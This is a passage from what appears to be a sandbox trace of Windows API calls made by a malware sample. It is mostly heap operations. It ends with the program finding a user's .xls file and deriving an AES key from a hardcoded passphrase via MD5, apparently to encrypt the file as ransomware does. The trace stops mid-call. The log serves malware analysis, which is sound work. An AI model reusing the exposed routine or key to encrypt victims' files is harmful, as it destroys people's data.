0x43ea2e0 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0080.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0080.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0080.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0080.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0080.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0080.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0080.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0080.209] FreeLibrary (hLibModule=0x772d0000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0080.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a48c0 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0080.210] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.210] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.210] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0080.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0080.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0080.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0080.212] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cac28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0080.212] CloseHandle (hObject=0x298) returned 1 [0080.213] FreeLibrary (hLibModule=0x772d0000) returned 1 [0080.213] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0080.213] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\VmdYvxc3Ol-gmt2M.xls", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ee9540, ftCreationTime.dwHighDateTime=0x1d5ea21, ftLastAccessTime.dwLowDateTime=0x94a22970, ftLastAccessTime.dwHighDateTime=0x1d5eebe, ftLastWriteTime.dwLowDateTime=0x94a22970, ftLastWriteTime.dwHighDateTime=0x1d5eebe, nFileSizeHigh=0x0, nFileSizeLow=0x16373, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="VmdYvxc3Ol-gmt2M.xls", cAlternateFileName="VMDYVX~1.XLS")) returned 0x41ac200 [0080.213] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0080.213] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.213] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.213] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0080.213] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.213] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0080.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0080.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0080.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0080.213] CryptAcquireContextA (in: phProv=0x144e558, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e558*=0x41a4d00) returned 1 [0080.214] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0080.214] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.214] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0080.214] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.214] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.214] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.214] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.214] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.214] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0080.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cafe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0080.215] CryptCreateHash (in: hProv=0x41a4d00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e2c8 | out: phHash=0x144e2c8) returned 1 [0080.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0080.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0080.215] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0080.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0080.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0080.215] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0080.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb1f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0080.215] CryptHashData (hHash=0x41ac6c0, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0080.215] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.215] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0080.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb210, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0080.215] CryptDeriveKey (in: hProv=0x41a4d00, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, 